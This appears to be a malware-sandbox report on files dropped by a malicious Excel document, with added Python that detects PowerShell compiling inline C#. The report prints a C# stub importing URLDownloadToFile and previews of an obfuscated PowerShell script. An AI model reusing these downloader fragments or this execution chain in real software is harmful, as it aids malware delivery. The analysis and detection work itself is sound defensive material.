                                                                      MD5:0FE86A63C62B7478BD1542945DB58A7F
                                                                      SHA1:78C4D9A2A3525D2E0D634F5E8BED732BDD16847C
                                                                      SHA-256:FAECC5D378189130757D69D053608EFF89AE8E46CA773305AF3EF2C838BA0207
                                                                      SHA-512:98B6BEC2BF92027425C710776244FA562B69E2858FDCA303AB7137CAAF23CEE1393F5212155B4778BE0A2B7CA008DF841998F2F8F6F5C6F80E6332AC94494320
                                                                      Malicious:false
                                                                      Preview:....X...........A....................... EMF......#..................... ...X...........F...$.......GDIC........@.................................&...............Word..Microsoft Word............................................Courier New.......-................................@..Times New Roman.......-.....................................&.......................................C. .....#...............(.......#...............]7..]7......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):1500652
                                                                      Entropy (8bit):0.38359994376437007
                                                                      Encrypted:false
                                                                      SSDEEP:12:YqZLEoorjllmvtoEEERttoERtt44fzWbx7PkyWa2+12p7p+pNGiYGfMqMj2ENva0:YmLyrZG
                                                                      MD5:E099B0811373326BD60BEB4380FC2DCD
                                                                      SHA1:8A10955F72FF0A16AB991FE620D460444AE70300
                                                                      SHA-256:ECB7507C68931C9EDDED0DA5FB7F7A9A0D4FDA9A22CD24A177083B1EF485F45F
                                                                      SHA-512:86C13084C0FACD4FBA0B491E88E2A324BF4098B10D384C9C7DE2D5A06606943294B61DFF12A256285AFDE7F864374BF11064F27F4978365B8E0C7A73228C7EF2
                                                                      Malicious:false
                                                                      Preview:....l...........Q...H............)...;.. EMF................................8...X....................?...........................................)...;..........R...I...Q...0...........Q...H...................R...I...P...(...x........... ....)...;..(...R...I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):146860
                                                                      Entropy (8bit):2.796455595167375
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YssSm/SacgbNk86RW7wRyFJgUiwJ6rvI9JxZKlEJfK1QVuIX0YTRJWgVTaI6mmpe:o6vmurYEozhngbQXg6FOEXvjDZ/ybuh9
                                                                      MD5:DBE385F855DE00AC91E71C45E36EB343
                                                                      SHA1:0FCD7FC4BFC0A231CCE5EFD51C47C88CF8935F99
                                                                      SHA-256:0F05517138D391C679580AC33C248ED934E25E9D76958E730EDAE3605C2FBBD3
                                                                      SHA-512:5DD425C4C71173160AB532B5DD1E3267157A8E03D1CCF34C1E0EA152002BEF44DC0A5FA1DABCC6D94D3924DD6DB13F348F529B82E52CD4E333F2392D4F177A5A
                                                                      Malicious:false
                                                                      Preview:....l...............`............B...... EMF.....=..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a...'......................%..........................................................L...d...............:...............;...!..............?...........?................................'.......................%...........(.......................L...d.......:.......t.......:.......
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):330948
                                                                      Entropy (8bit):4.975044135667186
                                                                      Encrypted:false
                                                                      SSDEEP:3072:j0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:j0Bd8yCKdQRzw4muaZ9TARfMDcFi
                                                                      MD5:F9157BC2C7748EC147ACF123E0B02E27
                                                                      SHA1:35F6DAC30F90C2B97C9A56C041DB3C7FEC5C4D89
                                                                      SHA-256:CCD5744ED8D269CD48305EDFA526AFE15C96A9374B0B4EF049F658C4772775D0
                                                                      SHA-512:3DCE24241BD64DC84F363DF2DF70191F6A6D98233A42AD283448A3C31D11095DE00483D6AD42E9F30BFE3FD8B16F64F3020C52A0A28CE634C0457A6C4E2873DE
                                                                      Malicious:false
                                                                      Preview:....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):5245540
                                                                      Entropy (8bit):2.8300524177296125
                                                                      Encrypted:false
                                                                      SSDEEP:12288:Km6vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgY:/Z5N
                                                                      MD5:5AF3250B7B9FF11B3D428C96FA6210C6
                                                                      SHA1:6A564F4024D6FD7A8165BFA3054BC5C5200B79D0
                                                                      SHA-256:46EF4BE8511882901BB4127D7050942D4EF6CA9C034F85967385F9847CAB594D
                                                                      SHA-512:19363B20791B203CF91446990E2BD316D2AE7A41C6CD37A350F4C15EE8A41EDFD50A47F13AD514D1A720B74D6407E940F17BEB2FD71645867B56C9EB3BCFDACE
                                                                      Malicious:false
                                                                      Preview:....l............................i...^.. EMF....d.P.$)..3...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................C..."...........!...................................................C..."...........!...................................................C..."...........!...................................................C..."...........!...................................................C...'.......................%...........................................................L...d...........w...p...........x...q...!..............?...........?................................'.......................%...........(.......................L...d.......p...]...........p...^...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):591648
                                                                      Entropy (8bit):2.3082558364276564
                                                                      Encrypted:false
                                                                      SSDEEP:1536:hrYfIrWts4Myv05BgE8YE27f6cPtG7Mc/izMjVh:Nr+s4ME0wh
                                                                      MD5:0085835A9F812794B771FBAF0F04A6BE
                                                                      SHA1:4B7B69212A1ED3F10D7327AF9B0A1F4A5C398E53
                                                                      SHA-256:559F83929E62E12E00F5A3BEA7006914569212C7CA452142B1844DFB46009274
                                                                      SHA-512:6852420090DD276C6595005573482147312B7C4A85C12A8EF9A82141F3008FB1FF2C4BF6C95E44F14D515FFE7185263038EA431AB952FDCB69872529A348C852
                                                                      Malicious:false
                                                                      Preview:....l...........^...r...........QN...a.. EMF.... ...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 28 06:28:14 2024, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1328
                                                                      Entropy (8bit):3.9785053626481903
                                                                      Encrypted:false
                                                                      SSDEEP:24:Hwe9E2UkB+kRHbwKdNwI+ycuZhN0akSQPNnqSqd:oiRsKdm1ul0a3IqSK
                                                                      MD5:E82B2A187E51C48C2C5E0B7ACCB6BF44
                                                                      SHA1:631F4A227CD358970BB1B6F8109879D2009BD9DE
                                                                      SHA-256:058D5585959E4880C964BC4B46629077DE4274874BFA9CAAC401391FF0948701
                                                                      SHA-512:81396E007F57B1D10E37BF3A63F44A58452377FAF7324AF347987AA06A20557D80D040631EEF0176D4245058C6C8A256E179D395FB36316D4722F362E21E947A
                                                                      Malicious:false
                                                                      Preview:L...~.Hg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP....................'uOF.%H..C..........3.......C:\Users\user\AppData\Local\Temp\RESADA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:MSVC .res
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.1020654347457133
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySak7YnqqQPN5Dlq5J:+RI+ycuZhN0akSQPNnqX
                                                                      MD5:9AB2F7EF851827754F46AC2548DDFD43
                                                                      SHA1:A36AADAFF168DCF6F7D6899A718757D71F62018D
                                                                      SHA-256:323D064128A920C79787164CE2793750DEA62C3AA8A16AF4BF09D6706371E269
                                                                      SHA-512:E19DC465335BBB6534E3354FD723F1BAFA051CE3DA7099F0AE69B5505DA4A5DB09561021D0C3352D4E638CB77FB79B4E7C991B938AB0F16641A665F5BD251DE1
                                                                      Malicious:false
                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                      Category:dropped
                                                                      Size (bytes):474
                                                                      Entropy (8bit):3.855329279868913
                                                                      Encrypted:false
                                                                      SSDEEP:6:V/DsYLDS81zuMUhDoLkmMenQXReKJ8SRHy4HKKm7w+5bmJ7y:V/DTLDfuuLGXfHOnH5CFy
                                                                      MD5:1C21E300AA84E974598ED1030235CED2
                                                                      SHA1:291AF9A40735B871EF010A3D5318EDE7C831D931
                                                                      SHA-256:3E868570530D620E7562624BF45CB78C040D2152A5971C70ADE1E1F8AF86F6FF
                                                                      SHA-512:1B2BA5972F35A490AFC594B217065694972C513C1FA29ED38B68C21081BBF1E58CCC21D97297EC0F43710256B67BFF8D97B749AB59B7DB1E666E3F402316FFBE
                                                                      Malicious:false
                                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace Aw.{. public class jLbfTJrSIuj. {. [DllImport("uRLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FNpJIKp,string yGOsLMc,string rAnbPN,uint XnVbrC,IntPtr khzsGiOK);.. }..}.
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):369
                                                                      Entropy (8bit):5.256597576036729
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fjR6zxs7+AEszIP23fjR0An:p37Lvkmb6Kz0WZEoGA
                                                                      MD5:7088B7D284EDA93862713E629DA957DF
                                                                      SHA1:F3BE418A577229F36BBB1558928589CAEB2F149C
                                                                      SHA-256:128B4D5661125BC9219F5612D2CA397FAF75D615852935CE1B982E0D8BEBD7BF
                                                                      SHA-512:661A1F81496D3A623682E87A07B7DC88066CA2D2E03615C6F8BE83ECCF0FBB8678457099EBE7EE39AA6EF6AC8B91AEFEC6FC88992D864FCE52A3476A7B226D50
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs"
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):3072
                                                                      Entropy (8bit):2.843846955136265
                                                                      Encrypted:false
                                                                      SSDEEP:24:etGSiPBe5ekrl8stgkclqnhDtbs6PtkZfq8bCZ0WI+ycuZhN0akSQPNnq:6Jskr+9l+tAJq8bCZX1ul0a3Iq
                                                                      MD5:FD533B3056E025996FA1893520F11B43
                                                                      SHA1:A63D72E46A67D98E404D587010AD136457119F63
                                                                      SHA-256:506708011A53D14576E578E1ED5A8DA88C46FD1D31A242AF1DCF4800ACE3AA97
                                                                      SHA-512:41BF244D8595331B9D7E4DD704D9A52F629C7E93E52A4D75334A5E79E6BC70A822DE083892CF62A99977CB54A37F59B9151DEB085BBC35930AE606CDF0E113A6
                                                                      Malicious:false
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.Hg...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....|.....|...........................#.............. =.....P ......O.........U.....].....e.....l.....s...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.rp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):866
                                                                      Entropy (8bit):5.33552668247284
                                                                      Encrypted:false
                                                                      SSDEEP:24:AId3ka6KzVEoUKaMD5DqBVKVrdFAMBJTH:Akka60VEoUKdDcVKdBJj
                                                                      MD5:6DF2DABF93519D145543DFCC4F3E6514
                                                                      SHA1:100C5D3F0D715A2AFBEB14BFD0514427ABE9B6B1
                                                                      SHA-256:794A7AAF8A06799D85404672583DF476DF0BDDEFD3C1ECF3714E9D7626B4EE96
                                                                      SHA-512:54CF70737BEDB1370DF28C7B07DDB6FF5A3B3CD6DF56913CB1A90D5546D54DF65A64D8E404CE5277BD44C8AB50212CD712A879595E8D866510AE0F7EDA3FC8E7
                                                                      Malicious:false
                                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
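The two csc.exe records above (the .cmdline file and the compiler output log, both produced under a powershell.exe parent) show the command line that PowerShell's Add-Type emits when it compiles inline C#: /t:library /utf8output, a reference to System.Management.Automation.dll, output written to %LOCALAPPDATA%\Temp\<8 random characters>\<same name>.dll from <same name>.0.cs, and /optimize+ given twice. The Python below is an added example, not part of the Joe Sandbox report: it pulls those switches out of a csc.exe command line and scores that fingerprint. The first command line is copied from the record above; the contrasting build invocation is constructed.

```python
import re

# Command line copied from the csc.exe record above (rpgvm2d4 is the directory the sandbox observed).
PAGE_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
    r'/R:"System.dll" '
    r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" '
    r'/R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll" '
    r'/debug- /optimize+ /warnaserror /optimize+ '
    r'"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs"'
)

# Constructed ordinary build for contrast: same compiler, project paths, no PowerShell reference.
BUILD_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /optimize+ '
    r'/R:"System.dll" /out:"C:\src\tool\bin\tool.dll" "C:\src\tool\Program.cs"'
)

QUOTED_SWITCH = re.compile(r'/(?P<name>[A-Za-z]+):"(?P<value>[^"]+)"')
TAIL_SOURCE = re.compile(r'"(?P<src>[^"]+\.cs)"\s*$', re.IGNORECASE)
# Add-Type names both files after one random 8-character directory under %TEMP%.
ADD_TYPE_OUT = re.compile(r'\\Temp\\(?P<d>[a-z0-9]{8})\\(?P=d)\.dll$', re.IGNORECASE)
ADD_TYPE_SRC = re.compile(r'\\Temp\\(?P<d>[a-z0-9]{8})\\(?P=d)\.0\.cs$', re.IGNORECASE)


def classify_csc(cmdline: str) -> dict:
    """Extract /R:, /out: and the trailing source file, then score the Add-Type shape."""
    refs, out = [], None
    for m in QUOTED_SWITCH.finditer(cmdline):
        name = m.group("name").lower()
        if name == "r":
            refs.append(m.group("value"))
        elif name == "out":
            out = m.group("value")
    src_m = TAIL_SOURCE.search(cmdline)
    src = src_m.group("src") if src_m else None
    out_m = ADD_TYPE_OUT.search(out or "")
    src_dir_m = ADD_TYPE_SRC.search(src or "")
    same_random_dir = bool(
        out_m and src_dir_m and out_m.group("d").lower() == src_dir_m.group("d").lower()
    )
    refs_automation = any(r.lower().endswith("system.management.automation.dll") for r in refs)
    return {
        "references": refs,
        "out": out,
        "source": src,
        "references_automation": refs_automation,
        "temp_random_dir": same_random_dir,
        "duplicate_optimize": cmdline.count("/optimize+") == 2,
        "is_library": "/t:library" in cmdline.lower(),
        # Add-Type fingerprint: the PowerShell assembly is referenced AND the
        # %TEMP%\<rand8>\<rand8>.dll / <rand8>.0.cs layout is used.
        "add_type_pattern": refs_automation and same_random_dir,
    }
```

The same command line is produced by legitimate Add-Type calls in administrative scripts, so treat the verdict as an enrichment field on the process event and let the parent chain (here EXCEL.EXE down to powershell.exe) carry the alert.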
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):166446
                                                                      Entropy (8bit):3.894631434751547
                                                                      Encrypted:false
                                                                      SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                      MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                      SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                      SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                      SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                      Malicious:true
                                                                      Preview:..........K.L.c.v.K.W.Z.L.L.B.G.B.g.i.L. .=. .".K.W.t.r.i.c.l.i.n.i.a.r.c.h.a.L.j.x.m.q.A.c.A.U.a.r.".....g.b.h.x.G.P.p.K.m.U.o.b.W.Q.p. .=. .".c.c.W.b.N.W.k.O.k.i.L.U.i.H.A.".....S.A.K.N.t.n.e.k.A.P.U.W.L.z.z. .=. .".b.W.K.i.B.K.h.H.G.e.d.d.C.K.b.".....m.W.a.J.a.m.o.P.p.v.Z.h.N.i.k. .=. .".z.o.S.A.K.n.d.O.e.W.q.G.O.L.c.".....K.C.I.L.a.b.R.x.P.J.W.t.G.u.g. .=. .".S.H.f.g.J.R.L.e.c.Z.P.c.i.r.i.".....K.c.b.L.x.L.p.a.c.t.h.u.W.b.Z. .=. .".I.p.h.W.p.m.h.g.G.B.d.K.J.q.B.".........L.d.G.W.A.a.h.k.c.P.L.L.k.W.P. .=. .".A.L.K.f.W.b.z.c.K.G.m.O.J.m.W.".....c.K.i.Q.W.W.n.v.I.L.l.L.W.C.u. .=. .".W.Z.m.G.q.q.L.t.i.L.Z.R.K.J.c.".....t.p.c.W.P.n.P.W.G.H.P.d.O.m.K. .=. .".o.R.R.C.N.W.e.U.e.L.z.L.v.p.O.".........s.U.A.l.H.k.x.L.g.G.K.k.o.c.u. .=. .".k.i.m.A.j.I.i.e.x.L.q.P.l.x.u.".....Z.l.L.A.i.K.T.p.c.R.K.L.I.K.i. .=. .".K.g.W.h.p.d.B.a.K.K.L.h.K.C.u.".....o.m.L.L.m.L.C.j.z.U.L.z.L.B.A. .=. .".W.m.u.W.v.B.W.g.L.z.h.O.h.c.L.".....j.c.q.S.W.c.O.Z.W.p.N.A.i.u.t. .=. .".d.z.G.h.L.Z.h.L.A.J.k.W.N.h.W."...
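The dropped script above is UTF-16LE with a BOM, and its Entropy (8bit) of 3.89 looks moderate next to the 5.33 of the UTF-8 compiler log, although the content is obfuscated random identifiers. For ASCII-range text every second byte of UTF-16LE is NUL, so the byte entropy is about 1 + H/2, where H is the entropy of the same text stored as UTF-8; 3.89 would correspond to roughly 5.8 bits of UTF-8 text. The Python below is an added example, not from the report: it computes the figure the way sandboxes do, detects UTF-16LE, and re-encodes before comparing. The sample script is constructed from the identifiers visible in the preview and is not the sandbox's 166 KB file.

```python
import math
from collections import Counter

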